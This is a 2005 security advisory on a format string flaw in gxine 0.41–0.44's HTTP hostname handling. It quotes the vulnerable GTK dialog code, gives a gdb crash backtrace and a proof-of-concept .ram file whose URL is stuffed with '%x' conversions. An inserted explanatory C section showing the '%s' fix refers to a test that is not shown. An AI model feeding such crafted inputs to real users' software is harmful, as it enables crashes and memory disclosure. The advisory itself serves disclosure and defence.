pst.advisory : gxine remote exploitable . opensource is god .lol windows

Created: 2005-05-22  Updated: 2005-05-23
Article type: original
Submitted by: jsk__ (jsk_at_ph4nt0m.org)


Systems affected:

gxine 0.44, 0.43, 0.42, 0.41

Not affected:

Not all of the above are exploitable.


1: Why: it is a format string vulnerability in the HTTP hostname handling. The new Firefox can launch gxine as a media handler on many Linux systems...


So it is very dangerous!!!!!!





2: Tips:

void v_display_message (const gchar *title, GtkMessageType type,
                        const gchar *fmt, va_list ap)
{
    GtkWidget *dialog;
    gchar *msg;
    gboolean modal = (fmt == NULL);

    if (modal)
        fmt = va_arg (ap, const gchar *);

    msg = g_strdup_vprintf (fmt, ap);
    va_end (ap);

    /* boom ... msg is passed where gtk_message_dialog_new () expects a
     * printf-style format string; it should be GTK_BUTTONS_CLOSE, "%s", msg */
    dialog = gtk_message_dialog_new (NULL, GTK_DIALOG_DESTROY_WITH_PARENT, type,
                                     GTK_BUTTONS_CLOSE, msg);

    gtk_window_set_title (GTK_WINDOW (dialog), title);
    gtk_window_set_position (GTK_WINDOW (dialog), GTK_WIN_POS_CENTER);

    if (modal)
        gtk_window_set_modal (GTK_WINDOW (dialog), TRUE);

    g_signal_connect (G_OBJECT (dialog), "response",
                      G_CALLBACK (response_cb), NULL);
    g_object_set_data (G_OBJECT (dialog), "msg", msg);
    gtk_widget_show (dialog);
}


Call chain, from the sink back to the caller:
v_display_message () <-- display_error () and many other functions <-- report_error () <-- http_open ()
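As an added illustration, not gxine's or GTK's own code: a stand-in for the printf-style sink, the corrected call that passes the message through "%s", and a small check that counts how many conversions an untrusted hostname would trigger if it ever reached a format parameter. The names dialog_text_new, count_format_conversions, display_message_fixed and fixed_message_roundtrips are hypothetical.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for gtk_message_dialog_new(): as in GTK, the last fixed
 * parameter is a printf-style format and the arguments follow it. */
static const char *dialog_text_new(const char *fmt, ...)
{
    static char buf[256];       /* stand-in for the dialog's label text */
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(buf, sizeof buf, fmt, ap);
    va_end(ap);
    return buf;
}

/* Number of conversions an untrusted string would perform if it reached
 * a format parameter; "%%" is a literal percent sign and is not counted.
 * Any value above zero is exactly the bug class the advisory describes. */
int count_format_conversions(const char *s)
{
    int count = 0;
    for (; *s != '\0'; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%')
            s++;                /* escaped percent: skip the pair */
        else
            count++;
    }
    return count;
}

/* Fixed form of the gxine call: the message goes through "%s", so its
 * '%' characters are copied verbatim instead of being interpreted. */
const char *display_message_fixed(const char *msg)
{
    return dialog_text_new("%s", msg);
}

/* 1 if the fixed path reproduces the message byte for byte, else 0. */
int fixed_message_roundtrips(const char *msg)
{
    return strcmp(display_message_fixed(msg), msg) == 0;
}
```

The constructed URL in the test mirrors the advisory's .ram file: eleven "%x" conversions that the original code would have handed to vfprintf with no matching arguments.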


3: More details (gdb backtrace)


    Program received signal SIGSEGV, Segmentation fault.
    0x405cdc43 in vfprintf () from /lib/libc.so.6
    (gdb) bt
    #0 0x405cdc43 in vfprintf () from /lib/libc.so.6
    #1 0x405ec976 in vasprintf () from /lib/libc.so.6
    #2 0x405493d7 in g_vasprintf () from /usr/lib/libglib-2.0.so.0
    #3 0x40539674 in g_strdup_vprintf () from /usr/lib/libglib-2.0.so.0
    #4 0x40217391 in gtk_message_dialog_new () from /usr/lib/libgtk-x11-2.0.so.0
    #5 0x0806dc83 in v_display_message ()
    #6 0x0806dda2 in display_error ()
    #7 0x0806cf45 in report_error ()
    #8 0x0806d278 in http_open ()
    Previous frame inner to this frame (corrupt stack?)
    (gdb) x/i $eip
    0x405cdc43 <vfprintf+10195>: mov %ecx,(%eax)


    4: A LAME proof-of-concept

    cat fmtexp.ram

    http://AAAAA%x%x%x%x%x%x%x%x%x%x%x%...paihb/42tj02.rm


CREDIT:

jsk:exworm (www.0xbadexworm.org) discovered this vulnerability

Thanks: all members of PST, and doris